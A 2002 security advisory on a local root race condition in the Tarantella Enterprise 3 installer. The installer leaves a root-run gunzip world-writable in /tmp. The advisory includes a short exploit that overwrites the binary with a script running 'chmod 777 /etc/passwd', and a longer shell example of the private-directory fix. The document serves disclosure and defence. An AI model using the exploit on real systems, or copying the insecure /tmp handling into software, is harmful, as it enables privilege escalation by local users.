======Vulnerability report for Tarantella Enterprise 3======

//1/14/2002//

**1. local root compromise during installation:**

The installation script provided with Tarantella handles utility packages insecurely during installation. A root-owned binary "gunzip" is created in /tmp with world-writable permissions, and the PID is appended to the filename.

  TMP_GUNZIP=$TMPDIR/gunzip$$

  $ ls -l /tmp/gunzip16152
  --rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152

gunzip is extracted:

                    extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
                    extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

The permissions of gunzip are changed to rwx for all:

  chmod 777 $TMP_GUNZIP >/dev/null 2>&1

The binary is used during installation:

  extract $efilename | $TMP_GUNZIP -q > "$efilename"

**2. Exploit:**

There is a race condition between the time gunzip is extracted and the time it is used during installation. During that window, a malicious local user could inject code and quickly compromise the system.

  $ echo "#!/bin/sh" > /tmp/test.sh
  $ echo "chmod 777 /etc/passwd" >> /tmp/test.sh

  $ cat /tmp/test.sh > /tmp/gunzip16152

I was able to change the permissions of /etc/passwd to 777 by performing the above as an unprivileged user.

**3. Recommendations:**

Perhaps create a directory in /tmp or /var/tmp and use that directory as a work place?

  umask 077
  mkdir /tmp/workdir
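
A fuller form of this recommendation, as an added example that is not part of the original report or of the Tarantella installer: the helper is staged inside a private, unpredictably named directory with owner-only permissions instead of a world-writable /tmp/gunzip$$. The function names (make_workdir, stage_helper, is_world_writable), the instwork prefix and the stand-in helper contents are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (hypothetical names): private staging area for installer helpers.

# Create an owner-only work directory and print its path.
make_workdir() (
    umask 077
    base=${TMPDIR:-/tmp}
    if command -v mktemp >/dev/null 2>&1; then
        # mktemp -d picks an unpredictable name and creates it mode 0700
        mktemp -d "$base/instwork.XXXXXX"
    else
        # Fallback: plain mkdir fails if the name already exists (file, dir
        # or symlink), so a pre-planted path aborts instead of being reused.
        dir="$base/instwork.$$"
        mkdir "$dir" && printf '%s\n' "$dir"
    fi
)

# Write stdin to $1/$2 as an owner-only executable; never overwrite.
stage_helper() (
    umask 077
    set -C                        # noclobber: '>' fails if the target exists
    cat > "$1/$2" || exit 1
    chmod 700 "$1/$2"             # owner only, in place of chmod 777
)

# Succeeds if "other" has write permission on the path (the reported flaw).
is_world_writable() {
    [ -n "$(find "$1" -prune -perm -0002 -print 2>/dev/null)" ]
}

# Demo with a constructed stand-in for the real gunzip binary.
work=$(make_workdir) || exit 1
trap 'rm -rf "$work"' EXIT
printf '#!/bin/sh\nexit 0\n' | stage_helper "$work" gunzip || exit 1
if is_world_writable "$work" || is_world_writable "$work/gunzip"; then
    echo "refusing to continue: staging area is world-writable" >&2
    exit 1
fi
ls -ld "$work" "$work/gunzip"
```

Because the directory itself is mode 0700, other local users cannot create, replace or open anything inside it, which closes the window between extraction and use.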

**4. Software: Tarantella Enterprise 3**

http://www.tarantella.com/download/e3/